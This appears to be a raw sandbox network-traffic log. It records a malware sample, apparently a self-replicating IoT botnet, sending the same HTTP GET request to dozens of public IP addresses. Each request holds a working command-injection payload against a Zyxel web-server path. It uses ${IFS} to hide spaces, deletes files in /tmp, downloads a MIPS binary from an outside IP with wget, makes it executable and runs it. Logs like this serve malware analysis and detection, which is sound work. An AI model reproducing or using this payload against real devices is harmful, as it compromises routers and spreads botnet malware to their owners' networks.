                                                Jan 12, 2024 18:16:23.453691959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4379192.168.2.2338728137.29.197.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.453749895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4380192.168.2.233686047.132.14.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.453804970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4381192.168.2.2349656190.187.96.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.453839064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4382192.168.2.234805434.165.111.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.453893900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4383192.168.2.233512644.215.234.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.453960896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4384192.168.2.2354780216.226.124.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.454046965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4385192.168.2.2340382104.254.126.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.454090118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4386192.168.2.234247498.31.29.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.454152107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4387192.168.2.233420642.67.37.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.454217911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4388192.168.2.233691025.45.107.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.454277039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4389192.168.2.2348528207.22.83.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.454339981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4390192.168.2.235919617.122.17.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.454400063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4391192.168.2.2333672201.108.68.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.454435110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4392192.168.2.233887832.102.123.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.454498053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4393192.168.2.2355480216.36.240.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.454541922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4394192.168.2.2344166137.176.207.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.454618931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4395192.168.2.234573890.98.162.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.454679012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4396192.168.2.2351238108.242.227.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.454735041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4397192.168.2.2344322150.15.200.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.454801083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4398192.168.2.236040674.5.75.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.454864979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4399192.168.2.234481413.248.253.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.458287954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4400192.168.2.2360494171.134.21.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.458311081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4401192.168.2.234580854.48.231.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.458403111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4402192.168.2.2342746190.2.39.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.458452940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4403192.168.2.2344874177.54.104.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.458496094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4404192.168.2.234460485.46.230.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.458539963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4405192.168.2.2338718142.151.155.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.458636045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4406192.168.2.2338518149.160.240.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.458712101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4407192.168.2.2338754111.125.84.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.458746910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4408192.168.2.2360554148.31.37.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.458798885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4409192.168.2.236093452.48.72.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.458862066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4410192.168.2.2360404191.183.78.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.458952904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4411192.168.2.234515673.195.244.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.459008932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4412192.168.2.2350694155.178.246.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.459070921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4413192.168.2.2343670161.158.189.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.459131956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4414192.168.2.2332960124.51.236.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.459187031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4415192.168.2.235521689.223.209.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.459258080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4416192.168.2.2358012217.94.23.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.459314108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4417192.168.2.2340920196.205.188.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.459384918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4418192.168.2.2339360204.51.31.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.459462881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4419192.168.2.235269651.128.190.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.459542036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4420192.168.2.233565819.67.111.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.459597111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4421192.168.2.235405095.238.111.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.459659100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4422192.168.2.2334584122.245.255.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.459695101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4423192.168.2.233684619.56.64.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.459769964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4424192.168.2.235495223.113.189.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.459836006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4425192.168.2.2334432101.161.157.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.459893942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4426192.168.2.2334078141.62.230.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.459955931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4427192.168.2.234996245.155.160.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.460011959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4428192.168.2.233879820.200.203.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.460043907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4429192.168.2.2334290153.56.50.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.460110903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4430192.168.2.235552869.72.101.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.460160971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4431192.168.2.234979254.138.111.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.460236073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4432192.168.2.235411860.184.114.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.460293055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4433192.168.2.2349952206.164.236.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.460345984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4434192.168.2.2349000202.232.29.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.460411072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4435192.168.2.2350844169.90.120.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.460464954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4436192.168.2.2350024122.30.97.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.460536003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4437192.168.2.2336592119.133.118.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.460591078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4438192.168.2.2343186198.220.17.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.460668087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4439192.168.2.2360506117.189.177.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.460725069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4440192.168.2.233751264.162.230.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.460793018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4441192.168.2.233779278.68.244.188443
                                                TimestampBytes transferredDirectionData
